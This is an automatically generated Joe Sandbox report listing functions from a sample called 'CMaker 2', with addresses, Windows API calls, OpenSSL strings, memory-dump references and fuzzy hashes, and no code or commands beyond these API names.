                                                                                                                                                                                  • Opcode Fuzzy Hash: c31540d1621b960633301173278a43c162921b7fbac8ddbd441109263ef94ee1
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7591D87AE0865185F750CFA5A4442BD2BA0BB47B88F98517DDE2E96AC4EF38E4D1C700
                                                                                                                                                                                  Function 00007FF6FABF5444 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1279662727-0
                                                                                                                                                                                  • Opcode ID: 79491aa10e773e0c302c047c4418e2f379399a005a06daa6a5ce9d1c3ac76bcc
                                                                                                                                                                                  • Instruction ID: eac6bdee25a9925612cf5e5445845f9d139d0e8daf377f125f5d5eaf104486b5
                                                                                                                                                                                  • Opcode Fuzzy Hash: 79491aa10e773e0c302c047c4418e2f379399a005a06daa6a5ce9d1c3ac76bcc
                                                                                                                                                                                  • Instruction Fuzzy Hash: A541A176D1C78283E7108BA0D5103696660FB963A4F549379E6BC83AD6EF6CA5E08700
                                                                                                                                                                                  Function 00007FFD935A14BF Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 243COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2264373753.00007FFD935A1000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFD935A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2264326565.00007FFD935A0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93623000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93625000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD9364D000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93658000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93663000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264633569.00007FFD93667000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264772265.00007FFD93668000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd935a0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                  • String ID: ..\s\ssl\statem\statem.c$state_machine
                                                                                                                                                                                  • API String ID: 1452528299-1722249466
                                                                                                                                                                                  • Opcode ID: fa1af6e95ef90c32761611ab3741ed222fae2e63033c217ccf4e575d4f6d4e5b
                                                                                                                                                                                  • Instruction ID: 2a9ff47c6ff73f1ccfd4a55fd36367db0a633696a5cf16877b5c05b965af7570
                                                                                                                                                                                  • Opcode Fuzzy Hash: fa1af6e95ef90c32761611ab3741ed222fae2e63033c217ccf4e575d4f6d4e5b
                                                                                                                                                                                  • Instruction Fuzzy Hash: A3A17226B0864282F7F69FA594717BD229DEF48B48F148435DA0DA6EC5DF3CE841C741
                                                                                                                                                                                  Function 00007FFD935A14EC Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 206COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2264373753.00007FFD935A1000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFD935A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2264326565.00007FFD935A0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93623000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93625000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD9364D000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93658000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93663000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264633569.00007FFD93667000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264772265.00007FFD93668000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd935a0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                  • String ID: ..\s\ssl\record\rec_layer_s3.c$ssl3_read_n
                                                                                                                                                                                  • API String ID: 1452528299-4226281315
                                                                                                                                                                                  • Opcode ID: 4c2733c3b718969d1cbac3eb1d3724bd0a089aa37b5c48834b770f1c95388feb
                                                                                                                                                                                  • Instruction ID: 6a82c507f2da0bc24ddf7488661888170d5b056a5c9dfe92d37d5c42624f3332
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c2733c3b718969d1cbac3eb1d3724bd0a089aa37b5c48834b770f1c95388feb
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9591A031B08A8292F7B2DFA5D4687B926A8EF48F88F544135DE1D67BA4DF38D845C300
                                                                                                                                                                                  Function 00007FF6FABF95E8 Relevance: 4.5, APIs: 3, Instructions: 14COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                                                                  • Opcode ID: 4bce210e197046ffe348e7a14864d607a673f15493918c1003c5f58545c9a52e
                                                                                                                                                                                  • Instruction ID: bd91c1054d8b031c15a9c4be533d474f94fb08711b9c0003abdc50652361a1ac
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4bce210e197046ffe348e7a14864d607a673f15493918c1003c5f58545c9a52e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 89D09E98B0870352FB546FB19C9917D12215F59741F54A4BCC83FC63E7FD2CA44D4600
                                                                                                                                                                                  Function 00007FF6FABE1DF0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,?,00000000,00007FF6FABE1AF6), ref: 00007FF6FABE1E09
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CurrentProcess
                                                                                                                                                                                  • String ID: [%d]
                                                                                                                                                                                  • API String ID: 2050909247-1705522918
                                                                                                                                                                                  • Opcode ID: 567895c906b1ac7ef89c88135c32040e074692b8ac70eb346fb877215d2ad8c6
                                                                                                                                                                                  • Instruction ID: fe25dfc53717ae67c045946c01775ab4e84f0969e9ab867c3f2d2b185c196c9f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 567895c906b1ac7ef89c88135c32040e074692b8ac70eb346fb877215d2ad8c6
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1EE09262A1CB4581E710EBA4F48106E6260FF99380F5050B8F6ED8779BEF3CD1A08B40
                                                                                                                                                                                  Function 00007FF6FABEE534 Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                  • Opcode ID: 16af8936fa4a8cfb084170ab3fdfe968383d28d333c1f7fec82ea00825d56c1b
                                                                                                                                                                                  • Instruction ID: 0d944b76c3a0a486452a833920b81a7f533ab57ada5ff39e63f3a89c797b0e31
                                                                                                                                                                                  • Opcode Fuzzy Hash: 16af8936fa4a8cfb084170ab3fdfe968383d28d333c1f7fec82ea00825d56c1b
                                                                                                                                                                                  • Instruction Fuzzy Hash: CA511671B1968256FB289E25944067A66D1BF42BA4F8887B4DE7DC37C6FF7CE4008700
                                                                                                                                                                                  Function 00007FF6FABEB09C Relevance: 3.1, APIs: 2, Instructions: 102COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1236291503-0
                                                                                                                                                                                  • Opcode ID: 6551513a98c324d7d7ba12c955d8146a8b4f51f5bb9c93bdc58fe40068057fbf
                                                                                                                                                                                  • Instruction ID: 94a78f0cf88e467c4d106e3aec20244f6077ffdb98d14b7522bbcface01ac7b6
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6551513a98c324d7d7ba12c955d8146a8b4f51f5bb9c93bdc58fe40068057fbf
                                                                                                                                                                                  • Instruction Fuzzy Hash: DF313D25E1820382FB14AB65E5913B91391AF47784FC490F9E93ECB2D7FE6CE8049741
                                                                                                                                                                                  Function 00007FF6FABFC698 Relevance: 3.1, APIs: 2, Instructions: 74fileCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 442123175-0
                                                                                                                                                                                  • Opcode ID: 25ddec7b9a332254016cf731a5ec0e9392247c67621e278a2717bb20b3dfaf36
                                                                                                                                                                                  • Instruction ID: ab9a7c306e30524ada4e81d655482320e9228264bf32b9fed585038a487422c9
                                                                                                                                                                                  • Opcode Fuzzy Hash: 25ddec7b9a332254016cf731a5ec0e9392247c67621e278a2717bb20b3dfaf36
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E31F536A18B858ADB108F15E5442A977B0FB1A780F884076EB5EC3B95FF3CD451CB00
                                                                                                                                                                                  Function 00007FF6FABFC08C Relevance: 3.1, APIs: 2, Instructions: 71COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileHandleType
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3000768030-0
                                                                                                                                                                                  • Opcode ID: 0f9b56d894b59bf5b7e8383ca5e0cbe51dcfa835e806d662f5735474265d4d92
                                                                                                                                                                                  • Instruction ID: 8f9c13eb57b1dc536045943345398cc86d50a99d77232cf0eff2b97065dbff5e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0f9b56d894b59bf5b7e8383ca5e0cbe51dcfa835e806d662f5735474265d4d92
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5A318426A18B4681DB608F58A5541796650FB47BB0FA8137DDB7E873E0DF38E9A1E300
                                                                                                                                                                                  Function 00007FF6FABFBDA8 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • SetFilePointerEx.KERNEL32(?,?,?,?,?,00007FF6FABFBD94,?,?,?,00000000,?,00007FF6FABFBE9D), ref: 00007FF6FABFBDF4
                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00007FF6FABFBD94,?,?,?,00000000,?,00007FF6FABFBE9D), ref: 00007FF6FABFBDFE
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2976181284-0
                                                                                                                                                                                  • Opcode ID: ede5fc4d7b12468b8e87ad72fb039376ac055e7d4bec884aeb090efb761c461e
                                                                                                                                                                                  • Instruction ID: 260cdb23218bc496dc00b819130208203484408313b013ace6e31e54ca0b1c5c
                                                                                                                                                                                  • Opcode Fuzzy Hash: ede5fc4d7b12468b8e87ad72fb039376ac055e7d4bec884aeb090efb761c461e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 58110166608A8185DB108B25E8000696361AB42BF4F984375EE7E8B7E9EF3CD0508700
                                                                                                                                                                                  Function 00007FF6FABFA0E4 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • RtlFreeHeap.NTDLL(?,?,?,00007FF6FAC02B22,?,?,?,00007FF6FAC02B5F,?,?,00000000,00007FF6FAC03025,?,?,?,00007FF6FAC02F57), ref: 00007FF6FABFA0FA
                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF6FAC02B22,?,?,?,00007FF6FAC02B5F,?,?,00000000,00007FF6FAC03025,?,?,?,00007FF6FAC02F57), ref: 00007FF6FABFA104
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ErrorFreeHeapLast
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 485612231-0
                                                                                                                                                                                  • Opcode ID: 042bc8721a3345eaabeb78b0f294181831f5ba70ab5432ae3c86ec800ea28b45
                                                                                                                                                                                  • Instruction ID: 71257476fbf18d79ce36eef1ef414b87ea737ca4733f86ee20adad4ceded9e5e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 042bc8721a3345eaabeb78b0f294181831f5ba70ab5432ae3c86ec800ea28b45
                                                                                                                                                                                  • Instruction Fuzzy Hash: FCE08C54F2920686FF08AFF2D84A03916A45F86B40F8890B8C92EC62D2FE2C69918310
                                                                                                                                                                                  Function 00007FF6FABFA6E0 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,00007FF6FABFA55D,?,?,00000000,00007FF6FABFA612), ref: 00007FF6FABFA74E
                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF6FABFA55D,?,?,00000000,00007FF6FABFA612), ref: 00007FF6FABFA758
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CloseErrorHandleLast
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 918212764-0
                                                                                                                                                                                  • Opcode ID: fa9ac4c151c8ebe2f15a9508e0179b12dcacbbb1569cdd32a455063ae332efe8
                                                                                                                                                                                  • Instruction ID: 69abfc3edcffe8d1dd67eb7298bdbcb29d1ed8a6084e6d602a51513fb45ae67f
                                                                                                                                                                                  • Opcode Fuzzy Hash: fa9ac4c151c8ebe2f15a9508e0179b12dcacbbb1569cdd32a455063ae332efe8
                                                                                                                                                                                  • Instruction Fuzzy Hash: D721F615B1C64241FF5497E5A49027916A25F86BA0F8C82BDDA3EC77D3FE6CB4454300
                                                                                                                                                                                  Function 00007FF6FABFBB20 Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                  • Opcode ID: bd077d8a5a7c03cd002072d8ca953402e38cbe5d3df466adb21d87e7869545d0
                                                                                                                                                                                  • Instruction ID: 457d91623bbe1a8170b164b8524305621adeb3c4244010a7fc4349c327bc68e7
                                                                                                                                                                                  • Opcode Fuzzy Hash: bd077d8a5a7c03cd002072d8ca953402e38cbe5d3df466adb21d87e7869545d0
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F41E536A18205CBEB288B59E55027973A0EB57B80F980178D7AEC36D5EF2DE402C751
                                                                                                                                                                                  Function 00007FFD935FEC4C Relevance: 1.6, APIs: 1, Instructions: 337COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
